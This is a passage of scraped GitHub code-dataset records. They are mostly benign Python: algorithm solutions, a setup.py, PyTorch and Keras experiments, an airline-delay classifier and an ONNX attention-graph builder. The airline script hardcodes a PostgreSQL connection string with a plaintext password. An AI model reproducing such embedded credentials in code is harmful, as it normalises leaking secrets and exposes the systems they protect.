DeprecationWarning)\n\n#KMatrixTotTot = ZetaUnitGrid(12,173,0,2,0,2,1)\n#area = 
quad(KMatrixTotTot[x,y,h,day,473], 0, 1, args=(x,y,h))\n\n\nGillyTop = GillyLightEquation()\n\nprint(GillyTop)\n#KMatrix = lambda X, Y, HE, CH, CW, Zenith, Azimuth: np.ceiling()\n\n","repo_name":"pacificgilly1992/ForestDynamicswithGLE","sub_path":"GLEbreakups.py","file_name":"GLEbreakups.py","file_ext":"py","file_size_in_byte":5004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21436997709","text":"# BFS Algorithm\n\nfrom collections import deque\n\ndef BFS():\n Max = 0\n\n queue = deque()\n for i in range(N):\n for j in range(M):\n if arr[i][j] == 1:\n queue.append((j, i))\n visited[i][j] = 0\n\n while queue:\n x, y = queue.popleft()\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n if nx < 0 or ny < 0 or nx >= M or ny >= N: # 벽일 경우\n continue\n\n if visited[ny][nx] != 0:\n continue\n\n if arr[ny][nx] == 0:\n queue.append((nx, ny))\n visited[ny][nx] = visited[y][x] + 1\n arr[ny][nx] = 1\n Max = visited[ny][nx]\n\n return Max\n\n# input\nM, N = map(int, input().split())\narr = [list(map(int, input().split())) for _ in range(N)]\ndx = [1, -1, 0, 0] # 동서남북 이동, x축\ndy = [0, 0, -1, 1] # 동서남북 이동, y축\n\nvisited = []\nfor i in range(N):\n visited.append([])\n for j in range(M):\n visited[i].append(0)\n\nMax = BFS()\n\nfor i in range(N):\n for j in range(M):\n if arr[i][j] == 0:\n Max = -1\n break\n\nprint(Max)","repo_name":"Hunnibs/DataStructure-Algorithm_Python","sub_path":"BAEKJOON/7576.py","file_name":"7576.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71801678120","text":"# -*- coding: utf-8 -*-\nimport os\nimport re\nimport sys\n\nfrom setuptools import setup\n\n\ndef read(*args):\n return open(os.path.join(os.path.dirname(__file__), *args), encoding='utf8').read()\n\n\ndef extract_version(version_file):\n version_match = re.search(r\"^__version__ = ['\\\"]([^'\\\"]*)['\\\"]\", version_file, re.M)\n if version_match:\n return version_match.group(1)\n\n raise RuntimeError(\"Unable to find version string.\")\n\n\nif sys.version_info < (3, 7):\n sys.stderr.write('ERROR: You need Python 3.7 or later to install this package.\\n')\n exit(1)\n\nextras_require = {'plotting': ['matplotlib'],\n 'bloch_sphere_visualization': ['qutip', 'matplotlib'],\n 'fancy_progressbar': ['ipynbname', 'jupyter'],\n 'doc': ['jupyter', 'nbsphinx', 'numpydoc', 'sphinx', 'sphinx_rtd_theme'],\n 'tests': ['pytest>=4.6', 'pytest-cov', 'codecov']}\n\nextras_require['all'] = [dep for deps in extras_require.values() for dep in deps]\n\nsetup(name='filter_functions',\n version=extract_version(read('filter_functions', '__init__.py')),\n description='Package for efficient calculation of generalized filter functions',\n long_description=read('README.md'),\n long_description_content_type='text/markdown',\n url='https://github.com/qutech/filter_functions',\n author='Quantum Technology Group, RWTH Aachen University',\n author_email='tobias.hangleiter@rwth-aachen.de',\n packages=['filter_functions'],\n package_dir={'filter_functions': 'filter_functions'},\n install_requires=['numpy', 'scipy', 'opt_einsum', 'sparse', 'tqdm'],\n extras_require=extras_require,\n test_suite='tests',\n classifiers=[\n 'Programming Language :: Python :: 3',\n 'License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)',\n 'Operating System :: OS Independent',\n 'Topic :: Scientific/Engineering :: Physics',\n 
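# trove classifiers describe the package on PyPI; the minimum Python version\n        # itself is enforced at install time by the sys.version_info check above\n        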
])\n","repo_name":"qutech/filter_functions","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"18"} +{"seq_id":"9828068600","text":"from __future__ import print_function\nimport numpy as np\nfrom psnr import psnr\nimport argparse\nimport os\nimport random\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim as optim\nimport torch.utils.data\nimport torchvision.datasets as dset\nimport torchvision.transforms as transforms\nimport torchvision.utils as vutils\nfrom torch.autograd import Variable\nimport numpy as np\nfrom model import _netG\n\nfrom PIL import Image, ImageFilter,ImageOps\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--dataset', default='streetview',\n help='cifar10 | lsun | imagenet | folder | lfw ')\nparser.add_argument('--dataroot', default='dataset/val/',\n help='path to dataset')\nparser.add_argument('--workers', type=int,\n help='number of data loading workers', default=2)\nparser.add_argument('--batchSize', type=int,\n default=100, help='input batch size')\nparser.add_argument('--imageSize', type=int, default=128,\n help='the height / width of the input image to network')\nparser.add_argument('--nz', type=int, default=100,\n help='size of the latent z vector')\nparser.add_argument('--ngf', type=int, default=64)\nparser.add_argument('--ndf', type=int, default=64)\nparser.add_argument('--nc', type=int, default=3)\nparser.add_argument('--niter', type=int, default=25,\n help='number of epochs to train for')\nparser.add_argument('--lr', type=float, default=0.0002,\n help='learning rate, default=0.0002')\nparser.add_argument('--beta1', type=float, default=0.5,\n help='beta1 for adam. 
default=0.5')\nparser.add_argument('--cuda', action='store_true', help='enables cuda')\nparser.add_argument('--ngpu', type=int, default=1,\n help='number of GPUs to use')\nparser.add_argument('--netG', default='model/netG_streetview.pth',\n help=\"path to netG (to continue training)\")\nparser.add_argument('--netD', default='',\n help=\"path to netD (to continue training)\")\nparser.add_argument('--outf', default='.',\n help='folder to output images and model checkpoints')\nparser.add_argument('--manualSeed', type=int, help='manual seed')\n\nparser.add_argument('--nBottleneck', type=int, default=4000,\n help='of dim for bottleneck of encoder')\nparser.add_argument('--overlapPred', type=int,\n default=4, help='overlapping edges')\nparser.add_argument('--nef', type=int, default=64,\n help='of encoder filters in first conv layer')\nparser.add_argument('--wtl2', type=float, default=0.999,\n help='0 means do not use else use with this weight')\nopt = parser.parse_args()\nprint(opt)\n\n\nnetG = _netG(opt)\nnetG.load_state_dict(torch.load(\n opt.netG, map_location=lambda storage, location: storage)['state_dict'])\nnetG.eval()\n\ntransform = transforms.Compose([transforms.Scale(opt.imageSize),\n transforms.CenterCrop(opt.imageSize),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\ndataset = dset.ImageFolder(root=opt.dataroot, transform=transform)\nassert dataset\ndataloader = torch.utils.data.DataLoader(dataset, batch_size=opt.batchSize,\n shuffle=True, num_workers=int(opt.workers))\n\n\ninput_real = torch.FloatTensor(opt.batchSize, 3, opt.imageSize, opt.imageSize)\ninput_cropped = torch.FloatTensor(\n opt.batchSize, 3, opt.imageSize, opt.imageSize)\nreal_center = torch.FloatTensor(\n opt.batchSize, 3, int(opt.imageSize/2), int(opt.imageSize/2))\n\ncriterionMSE = nn.MSELoss()\n\nif opt.cuda:\n netG.cuda()\n input_real, input_cropped = input_real.cuda(), input_cropped.cuda()\n criterionMSE.cuda()\n real_center = real_center.cuda()\n\ninput_real = Variable(input_real)\ninput_cropped = Variable(input_cropped)\nreal_center = Variable(real_center)\n\ndataiter = iter(dataloader)\nreal_cpu, _ = dataiter.next()\n\ninput_real.data.resize_(real_cpu.size()).copy_(real_cpu)\ninput_cropped.data.resize_(real_cpu.size()).copy_(real_cpu)\nreal_center_cpu = real_cpu[:, :, int(opt.imageSize/4):int(opt.imageSize/4) +\n int(opt.imageSize/2), int(opt.imageSize/4):int(opt.imageSize/4)+int(opt.imageSize/2)]\nreal_center.data.resize_(real_center_cpu.size()).copy_(real_center_cpu)\n\n#TODO: preprocessing the images\nmode = 2\nrecon_image = None\n#DA = DataAugmentation.DataAugmentation()\n#input_cropped_edited = None\nif (mode ==1): #decolor\n print(input_cropped.shape)\n input_cropped_edited = [transforms.ToPILImage()(x) for x in input_cropped]\n input_cropped_edited = [ImageOps.grayscale(x) for x in input_cropped_edited]\n #input_cropped_edited = [transforms.Grayscale()(x) for x in input_cropped_edited]\n input_cropped_edited = [transforms.ToTensor()(x) for x in input_cropped_edited]\n input_cropped_edited = torch.stack(input_cropped_edited)\n print(input_cropped_edited.shape)\n recon_image = input_cropped_edited.clone()\n for i in range(3):\n input_cropped[:,i,:,:] = input_cropped_edited[:,0,:,:]\n #vutils.save_image(input_cropped,'./data_augmentation/decolor/cut1.png')\nelif (mode==2): #flip\n input_cropped= torch.flip(input_cropped,dims=[3])\n print(input_cropped.shape)\n #vutils.save_image(real_cpu[0], 'mode_2_orgi.png', normalize=True)\n 
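# note: dims=[3] is the width axis of the NCHW batch, so this is a horizontal\n    # flip; dims=[2] would flip the images vertically instead\n    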
#vutils.save_image(input_cropped[0],'mode_2_flipped.png',normalize=True)\nelif (mode==3): #Gaussian filter\n input_cropped_edited = [transforms.ToPILImage()(x) for x in input_cropped]\n input_cropped_edited = [x.filter(ImageFilter.GaussianBlur(radius=3)) for x in input_cropped_edited]\n input_cropped_edited = [transforms.ToTensor()(x) for x in input_cropped_edited]\n input_cropped_edited = torch.stack(input_cropped_edited)\n input_cropped = input_cropped_edited\nelif (mode==4): #Median filter\n input_cropped_edited = [transforms.ToPILImage()(x) for x in input_cropped]\n input_cropped_edited = [x.filter(ImageFilter.MedianFilter(size=3))for x in input_cropped_edited]\n input_cropped_edited = [transforms.ToTensor()(x) for x in input_cropped_edited]\n input_cropped_edited = torch.stack(input_cropped_edited)\n input_cropped = input_cropped_edited\nelif (mode==5): #Egde enhance\n input_cropped_edited = [transforms.ToPILImage()(x) for x in input_cropped]\n input_cropped_edited = [x.filter(ImageFilter.EDGE_ENHANCE)for x in input_cropped_edited]\n input_cropped_edited = [transforms.ToTensor()(x) for x in input_cropped_edited]\n input_cropped_edited = torch.stack(input_cropped_edited)\n input_cropped = input_cropped_edited\nelif (mode==6):#rotate\n input_cropped= torch.rot90(input_cropped,dims=[2,3])\n print(input_cropped.shape)\n\n#crop the image\ninput_cropped.data[:, 0, int(opt.imageSize/4)+opt.overlapPred:int(opt.imageSize/4)+int(opt.imageSize/2)-opt.overlapPred,\n int(opt.imageSize/4)+opt.overlapPred:int(opt.imageSize/4)+int(opt.imageSize/2)-opt.overlapPred] = 2*117.0/255.0 - 1.0\ninput_cropped.data[:, 1, int(opt.imageSize/4)+opt.overlapPred:int(opt.imageSize/4)+int(opt.imageSize/2)-opt.overlapPred,\n int(opt.imageSize/4)+opt.overlapPred:int(opt.imageSize/4)+int(opt.imageSize/2)-opt.overlapPred] = 2*104.0/255.0 - 1.0\ninput_cropped.data[:, 2, int(opt.imageSize/4)+opt.overlapPred:int(opt.imageSize/4)+int(opt.imageSize/2)-opt.overlapPred,\n int(opt.imageSize/4)+opt.overlapPred:int(opt.imageSize/4)+int(opt.imageSize/2)-opt.overlapPred] = 2*123.0/255.0 - 1.0\n\n\nvutils.save_image(real_cpu[0], 'mode_orgi.png', normalize=True)\nvutils.save_image(input_cropped[0],'mode_flipped.png',normalize=True)\n\n'''\nrgb_weights = torch.FloatTensor([0.2989, 0.5870, 0.1140]).resize_(torch.Size([3,1]))\nfor i in range(100):\n temp_size = input_cropped.data[i,:,:,:].size()\n temp_size2 = torch.Size([128,128,3])\n m = input_cropped.data[i,:,:,:].resize_(temp_size2)\n print(m.size(),rgb_weights.size())\n m = torch.mm(input_cropped.data[i,:,:,:],rgb_weights)\n input_cropped.data[i,:,:,:].resize_(t)\n \n t = np.copy(input_cropped.data[i,:,:,:])\n t = np.reshape(t,(128,128,3))\n t= np.dot(t,rgb_weights)\n input_cropped.data[i,:,:,:] = np.reshape(t,(3, 128,128)) \n'''\n \n#call the model and run\nprint(input_cropped.shape)\n#vutils.save_image(input_cropped.data,\n# 'val_cropped_samples.png', normalize=True)\nfake = netG(input_cropped)\nerrG = criterionMSE(fake, real_center)\nif (mode !=1):\n recon_image = input_cropped.clone()\n#original\n#recon_image.data[:, :, int(opt.imageSize/4):int(opt.imageSize/4) + int(opt.imageSize/2),\n# int(opt.imageSize/4):int(opt.imageSize/4)+int(opt.imageSize/2)] = fake.data\n#edited for decolor\n#fake.data[:,0,:,:] += fake.data[:,1,:,:]+fake.data[:,2,:,:]\n\nif (mode!=1):\n recon_image.data[:, :, int(opt.imageSize/4):int(opt.imageSize/4) + int(opt.imageSize/2),\n int(opt.imageSize/4):int(opt.imageSize/4)+int(opt.imageSize/2)] = fake.data\nfile_path = ''\nif (mode==1):\n fake_edited = 
[transforms.ToPILImage()(x) for x in fake.data]\n fake_edited = [ImageOps.grayscale(x) for x in fake_edited]\n #input_cropped_edited = [transforms.Grayscale()(x) for x in input_cropped_edited]\n fake_edited = [transforms.ToTensor()(x) for x in fake_edited]\n fake_edited = torch.stack(fake_edited)\n \n recon_image.data[:, :, int(opt.imageSize/4):int(opt.imageSize/4) + int(opt.imageSize/2),\n int(opt.imageSize/4):int(opt.imageSize/4)+int(opt.imageSize/2)] = fake_edited\n #vutils.save_image(recon_image,'./data_augmentation/decolor/fake.png')\n \n #recon_image=recon_image[:,0,:,:].resize_(torch.Size([100, 1, 128, 128]))\n file_path = './data_augmentation/decolor/'\nelif(mode==2):\n file_path = './data_augmentation/flip/'\nelif(mode==3):\n file_path = './data_augmentation/guassian/'\nelif(mode==4):\n file_path = './data_augmentation/medianFilter/'\nelif(mode==5):\n file_path = './data_augmentation/edgeEnhance/'\nelif(mode==6):\n file_path = './data_augmentation/rotate/'\nvutils.save_image(fake.data[0],'center.png',normalize=True)\nvutils.save_image(real_cpu, file_path+'val_real_samples.png', normalize=True)\nvutils.save_image(input_cropped.data,\n file_path+'val_cropped_samples.png', normalize=True)\nvutils.save_image(recon_image.data, file_path+'val_recon_samples.png', normalize=True)\np = 0\nl1 = 0\nl2 = 0\nif (mode==6):\n fake = torch.rot90(fake,dims=[2,3])\n fake = torch.rot90(fake,dims=[2,3])\n fake = torch.rot90(fake,dims=[2,3])\nif (mode==2):\n fake= torch.flip(fake,dims=[3])\nfake = fake.data.numpy()\nreal_center = real_center.data.numpy()\n\nt = real_center - fake\n\nl2 = np.mean(np.square(t))\nl1 = np.mean(np.abs(t))\nreal_center = (real_center+1)*127.5\nfake = (fake+1)*127.5\n\nfor i in range(opt.batchSize):\n p = p + psnr(real_center[i].transpose(1, 2, 0), fake[i].transpose(1, 2, 0))\n\n#print results session\nif(mode==1):\n print(\"Decolor the image!\")\nelif (mode==2):\n print(\"Flip the image!\")\nelif (mode==3):\n print('Guassian blur the image!')\nelif (mode==4):\n print('Median fliter!')\nelif (mode==5):\n print('Edge enhancement!')\nelif (mode==6):\n print('Rotate the image!')\nprint(\"l2: \",l2)\n\nprint(\"l1: \",l1)\n\nprint(p/opt.batchSize)\n","repo_name":"boyangx98/442Project","sub_path":"model1_dataAugmentation/Model1withDataAugmentation/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":11415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"34202987119","text":"import sys\nfrom collections import deque, Counter, defaultdict\nfrom itertools import product\nsys.setrecursionlimit(5 * 10 ** 5)\n# from pypyjit import set_param\n# set_param('max_unroll_recursion=-1')\ninput = lambda: sys.stdin.readline().rstrip()\nii = lambda: int(input())\nmi = lambda: map(int, input().split())\nli = lambda: list(mi())\ninf = 2 ** 63 - 1\n\ndef solve(N: int, A: \"List[int]\"):\n A.sort()\n q = deque(A)\n r = q.pop()\n l = q.popleft()\n ans = abs(l-r)\n while q:\n next = []\n next.append((abs(q[0]-l), 0, q[0], r))\n next.append((abs(q[0]-r), 0, l, q[0]))\n next.append((abs(q[-1]-l), -1, q[-1], r))\n next.append((abs(q[-1]-r), -1, l, q[-1]))\n next.sort(key=lambda x:x[0], reverse=True)\n ans += next[0][0]\n if next[0][1] ==0:\n q.popleft()\n else: \n q.pop()\n l = next[0][2] \n r = next[0][3] \n\n print(ans)\n\n\ndef main():\n N = ii() # type: int\n A =[ii() for _ in range(N)]\n\n solve(N, A)\n 
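# solve() prints the answer itself, so there is nothing to return here\n    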
return\n\nmain()\n","repo_name":"masahiro-999/atcoder-workspace","sub_path":"tenka1-2018/C/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74708313961","text":"from keras.models import Sequential\nfrom keras.layers import Dense\nimport numpy as np\nimport matplotlib.pylab as plt\n\n# Create dataset\nx = np.arange(0, np.pi * 2, 0.1)\ny = np.sin(x)\n\n# Some parameters\nACTIVE_FUN = 'tanh'\nBATCH_SIZE = 1\nVERBOSE=1\n\n# Create the model\nmodel = Sequential()\nmodel.add(Dense(40, input_shape=(1,), activation=ACTIVE_FUN))\nmodel.add(Dense(20, activation=ACTIVE_FUN))\nmodel.add(Dense(64, activation=ACTIVE_FUN))\nmodel.add(Dense(1))\n\n# Compile the model\nmodel.compile(loss='mean_squared_error', optimizer='sgd', metrics=['mean_squared_error'])\n\n# Fit the model\nmodel.fit(x, y, epochs=1500, batch_size=BATCH_SIZE, verbose=VERBOSE)\n\n# Evaluate the model\nscores = model.evaluate(x, y, verbose=VERBOSE)\nprint('%s: %.2f%%' % (model.metrics_names[1], scores[1] * 100))\n\n# Make predictions\nxnext = np.arange(np.pi * 2, np.pi * 4, 0.1)\nynext = np.sin(xnext)\ny_pred = model.predict(xnext)\ny_predOnTrain = model.predict(x)\n# Plot\nplt.plot(x, y, color='blue', linewidth=1, markersize='1', label = \"training data\")\nplt.plot(xnext, y_pred, color='green', linewidth=1, markersize='1', label = \"predicted y on unseen x\")\nplt.plot(xnext, ynext, 'm.', linewidth=1, markersize='1', label = \"true y on unseen x\")\nplt.plot(x, y_predOnTrain, color='yellow', linewidth=1, markersize='1', label = \"predicted y on training x\")\nplt.xlabel('Angle [rad]')\nplt.ylabel('sin(x)')\nplt.axis('tight')\nplt.show()","repo_name":"Chilibonitsu/ML-mlflow-AND-OR-XOR-plus-Sine-Wave-prediction","sub_path":"timeSeries mlflow/timeSeries betterSin.py","file_name":"timeSeries betterSin.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21094170579","text":"class Solution(object):\n    def reverse(self, x):\n        \"\"\"\n        :type x: int\n        :rtype: int\n        \"\"\"\n        neg = 1 if x >= 0 else -1\n        x *= neg\n        rev_x = 0\n        while x > 0:\n            rev_x = rev_x*10 + x%10\n            x //= 10  # floor division so x stays an int under Python 3\n        result = rev_x*neg if rev_x <= 2147483647 else 0\n        return result\n","repo_name":"466152112/LeetCode","sub_path":"Python/reverseInteger.py","file_name":"reverseInteger.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"29211673363","text":"from database import *\r\nfrom sqlalchemy.orm import sessionmaker\r\nimport pandas as pd\r\nimport seaborn as sns\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.pipeline import Pipeline\r\nfrom sklearn.model_selection import GridSearchCV\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom datetime import datetime\r\nfrom sqlalchemy import and_\r\n\r\nif __name__ == \"__main__\":\r\n    engine = create_engine('postgresql://postgres:marzipan@localhost/airInfoDB', echo=True)\r\n    meta = MetaData(schema='warehouse')\r\n    Base.metadata.create_all(engine)\r\n    Session = sessionmaker(bind=engine)\r\n    session = Session()\r\n\r\n    factors1 = ['month', 
'dimairlinesid', 'scheduleddep', 'originairportid', 'destairportid',\r\n 'scheduledtime', 'distance', 'scheduledarrival', 'arrivaltime', 'diverted', 'arrivaldelay']\r\n query = session.query(Flight).filter(and_(Flight.id <= 300000, Flight.id % 3 == 0))\r\n factorsArrays = [[] for _ in range(11)]\r\n for i in query.all():\r\n queryMonth = session.query(Date).filter(Date.id == i.dimdatesid).one()\r\n factorsArrays[0].append(queryMonth.month)\r\n for j in range(1, 11):\r\n eval(f\"factorsArrays[{j}].append(i.{factors1[j]})\")\r\n\r\n df = pd.DataFrame(factorsArrays)\r\n df = df.T\r\n df.columns = factors1\r\n print(df)\r\n\r\n labels = sorted(list(pd.unique(df['dimairlinesid'])))\r\n labelsTextQuery = session.query(Airline)\r\n labelsText = [labelsTextQuery.filter(Airline.id == i).one().airlinename for i in [int(k) for k in list(labels)]]\r\n print(labelsText)\r\n\r\n divertedCount = df[df['diverted'] == True]\r\n print(f'Diverted = {divertedCount.diverted.count()} out of {df.diverted.count()}')\r\n\r\n df = df.fillna(df.mean())\r\n print(df)\r\n\r\n\r\n def getStats(group):\r\n return {'min': group.min(), 'max': group.max(),\r\n 'count': group.count(), 'mean': group.mean()}\r\n\r\n\r\n globalStats = df['arrivaldelay'].groupby(df['dimairlinesid']).apply(getStats).unstack()\r\n globalStats = globalStats.sort_index()\r\n globalStats.index = labelsText\r\n globalStats = globalStats.sort_values('count')\r\n print(globalStats)\r\n\r\n globalStats.plot(y='count', kind='bar')\r\n plt.show()\r\n\r\n fig, ax = plt.subplots(figsize=(8, 8))\r\n wedges, texts, autotexts = ax.pie(df.groupby('dimairlinesid').mean()['arrivaldelay'], labels=labels,\r\n autopct='%1.1f%%',\r\n textprops=dict(color='w'), colors=[\"#025464\", \"#E57C23\", \"#F266AB\", \"#2CD3E1\",\r\n \"#643843\", \"#1B9C85\", \"#4C4C6D\", \"#0C134F\",\r\n \"#99A98F\", \"#B04759\", \"#FEFF86\", \"#212A3E\",\r\n \"#9384D1\", \"#263A29\", \"#B2A4FF\", \"#000000\"])\r\n\r\n ax.set_title('Average delay by airline')\r\n legend = ax.legend(wedges, labelsText,\r\n title='Airline',\r\n loc='center left',\r\n bbox_to_anchor=(1, 0, 0, 1))\r\n plt.setp(autotexts, size=12, weight='bold')\r\n plt.show()\r\n fig.savefig('mean-piechart', bbox_extra_artists=(legend,), bbox_inches='tight')\r\n\r\n fig, ax = plt.subplots(figsize=(8, 8))\r\n wedges, texts, autotexts = ax.pie(df.groupby('dimairlinesid').count()['arrivaldelay'], labels=labels,\r\n autopct='%1.1f%%',\r\n textprops=dict(color='w'), colors=[\"#025464\", \"#E57C23\", \"#F266AB\", \"#2CD3E1\",\r\n \"#643843\", \"#1B9C85\", \"#4C4C6D\", \"#0C134F\",\r\n \"#99A98F\", \"#B04759\", \"#FEFF86\", \"#212A3E\",\r\n \"#9384D1\", \"#263A29\", \"#B2A4FF\", \"#000000\"])\r\n\r\n ax.set_title('Number of flights by airline')\r\n legend = ax.legend(wedges, labelsText,\r\n title='Airline',\r\n loc='center left',\r\n bbox_to_anchor=(1, 0, 0, 1))\r\n plt.setp(autotexts, size=12, weight='bold')\r\n plt.show()\r\n fig.savefig('count-piechart', bbox_extra_artists=(legend,), bbox_inches='tight')\r\n\r\n sns.jointplot(x=df.scheduledarrival, y=df.arrivaltime)\r\n plt.show()\r\n\r\n corr = df.corr()\r\n sns.heatmap(corr)\r\n plt.show()\r\n\r\n result = []\r\n for row in df.arrivaldelay:\r\n if row > 15:\r\n result.append(1)\r\n else:\r\n result.append(0)\r\n\r\n df['result'] = result\r\n print(df)\r\n print(df.value_counts('result'))\r\n\r\n data = df.values\r\n X, y = data[:, :-4], data[:, -1]\r\n y = y.astype(int)\r\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.30, random_state=15)\r\n standardizer = 
StandardScaler()\r\n    X_train, X_test = standardizer.fit_transform(X_train), standardizer.fit_transform(X_test)\r\n\r\n    # test-set scores are stored as percentages (0-100) so they can feed the bar chart at the end\r\n    predResults = []\r\n    clf = DecisionTreeClassifier()\r\n    time1 = datetime.now()\r\n    clf = clf.fit(X_train, y_train)\r\n    time2 = datetime.now()\r\n    print(f'Decision Tree training time = {time2 - time1}')\r\n    pred = clf.predict(X_test)\r\n    time1 = datetime.now()\r\n    print(f'Decision Tree evaluation for the training set = {clf.score(X_train, y_train):.2%}')\r\n    predResults.append(clf.score(X_test, y_test)*100)\r\n    print(f'Decision Tree evaluation for the test set = {predResults[0]:.2f}%')\r\n    print(f'Decision Tree prediction time = {time1 - time2}')\r\n    sns.heatmap(confusion_matrix(y_test, pred), annot=True)\r\n    plt.show()\r\n\r\n    knn = KNeighborsClassifier(n_neighbors=5, n_jobs=-1)\r\n    pipe = Pipeline([(\"standardizer\", standardizer), (\"knn\", knn)])\r\n    search_space = [{\"knn__n_neighbors\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]}]\r\n    classifier = GridSearchCV(pipe, search_space, cv=5, verbose=0).fit(X_train, y_train)\r\n    best = classifier.best_estimator_.get_params()[\"knn__n_neighbors\"]\r\n    print(\"\\nThe best K for KNN =\", best)\r\n\r\n    time1 = datetime.now()\r\n    knn = KNeighborsClassifier(n_neighbors=best, n_jobs=-1).fit(X_train, y_train)\r\n    time2 = datetime.now()\r\n    print(f'KNN training time = {time2 - time1}')\r\n    pred = knn.predict(X_test)\r\n    time1 = datetime.now()\r\n    print(f'KNN evaluation for the training set = {knn.score(X_train, y_train):.2%}')\r\n    predResults.append(knn.score(X_test, y_test)*100)\r\n    print(f'KNN evaluation for the test set = {predResults[1]:.2f}%')\r\n    print(f'KNN prediction time = {time1 - time2}')\r\n    sns.heatmap(confusion_matrix(y_test, pred), annot=True)\r\n    plt.show()\r\n\r\n    time1 = datetime.now()\r\n    svc = SVC(kernel=\"rbf\").fit(X_train, y_train)\r\n    time2 = datetime.now()\r\n    print(f'SVC training time = {time2 - time1}')\r\n    pred = svc.predict(X_test)\r\n    time1 = datetime.now()\r\n    print(f'\\nSVC evaluation for the training set = {svc.score(X_train, y_train):.2%}')\r\n    predResults.append(svc.score(X_test, y_test)*100)\r\n    print(f'SVC evaluation for the test set = {predResults[2]:.2f}%')\r\n    print(f'SVC prediction time = {time1 - time2}')\r\n    sns.heatmap(confusion_matrix(y_test, pred), annot=True)\r\n    plt.show()\r\n\r\n    x_st = StandardScaler().fit_transform(X)\r\n    kmeans = KMeans(n_clusters=2, max_iter=500, algorithm=\"lloyd\", random_state=1)\r\n    kmeans.fit(x_st)\r\n    time1 = datetime.now()\r\n    predictKmeans = kmeans.predict(x_st)\r\n    time2 = datetime.now()\r\n    sns.heatmap(confusion_matrix(y, predictKmeans), annot=True)\r\n    plt.show()\r\n\r\n    ck = 0\r\n    for i in range(len(y)):\r\n        if y[i] == predictKmeans[i]:\r\n            ck += 1\r\n    print(f\"\\nK-Means Clustering evaluation = {ck / len(y) * 100}%\")\r\n    print(f'K-Means prediction time = {time2 - time1}')\r\n\r\n    predResults.append(ck / len(y) * 100)\r\n    predResults = pd.Series(predResults, index=[\"Decision Tree\", \"KNN\", \"SVC\", \"K-Means\"], name=\"Score\")\r\n    predResults.plot(y=\"Score\",kind=\"bar\")\r\n    plt.ylim([0,100])\r\n    plt.show()","repo_name":"expresoviter/Predicting-the-presence-of-flight-delays","sub_path":"ML/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21104833914","text":"import numpy as np\nimport onnx\nfrom onnx import GraphProto, OperatorSetIdProto, TensorProto, helper, numpy_helper  # noqa: F401\n\nhidden_size = 4\nattention_head = 
2\nhidden_per_attention = 2\n\n# Self-attention.\n# Handle self-attension.\n# MatMul->Add->Split->Reshape->Transpose->MatMul->Div->Mul->Sub->Softmax->Dropout->MatMul->Transpose->Reshape->MatMul->Add\n# |->Reshape->Transpose->| |\n# |->Reshape->Transpose------------------------------------------>|\n\nX = helper.make_tensor_value_info(\"input\", TensorProto.FLOAT, [\"batch\", \"seqlen\", hidden_size])\nX_mask = helper.make_tensor_value_info(\"mask\", TensorProto.FLOAT, [\"batch\", 1, \"seqlen\", \"seqlen\"])\nY = helper.make_tensor_value_info(\"output\", TensorProto.FLOAT, [\"batch\", \"seqlen\", hidden_size])\n\nqkv_weight_np_vals = (0.01 * np.arange(hidden_size * (hidden_size * 3), dtype=np.float32)).reshape(\n (hidden_size, hidden_size * 3)\n)\nqkv_weight_initializer = numpy_helper.from_array(\n qkv_weight_np_vals, \"transformer.attention.query_key_value.weight_transposed\"\n)\n\nqkv_bias_np_vals = 0.01 * np.arange(hidden_size * 3, dtype=np.float32)\nqkv_bias_initializer = numpy_helper.from_array(qkv_bias_np_vals, \"transformer.attention.query_key_value.bias\")\n\ndense_weight_np_vals = (0.01 * np.arange(hidden_size * hidden_size, dtype=np.float32)).reshape(\n (hidden_size, hidden_size)\n)\ndense_weight_initializer = numpy_helper.from_array(\n dense_weight_np_vals, \"transformer.attention.dense.weight_transposed\"\n)\n\ndense_bias_np_vals = 0.01 * np.arange(hidden_size, dtype=np.float32)\ndense_bias_initializer = numpy_helper.from_array(dense_bias_np_vals, \"transformer.attention.dense.bias\")\n\nshape_val = np.array([0, 0, attention_head, hidden_per_attention], dtype=np.int64)\nshape_initializer = numpy_helper.from_array(shape_val, \"concat_shape_0\")\nshape_val1 = np.array([0, 0, attention_head, hidden_per_attention], dtype=np.int64)\nshape_initializer1 = numpy_helper.from_array(shape_val1, \"concat_shape_1\")\nshape_val2 = np.array([0, 0, attention_head, hidden_per_attention], dtype=np.int64)\nshape_initializer2 = numpy_helper.from_array(shape_val2, \"concat_shape_2\")\nshape_val3 = np.array([0, 0, hidden_size], dtype=np.int64)\nshape_initializer3 = numpy_helper.from_array(shape_val3, \"concat_shape_3\")\n\nmatmul1 = 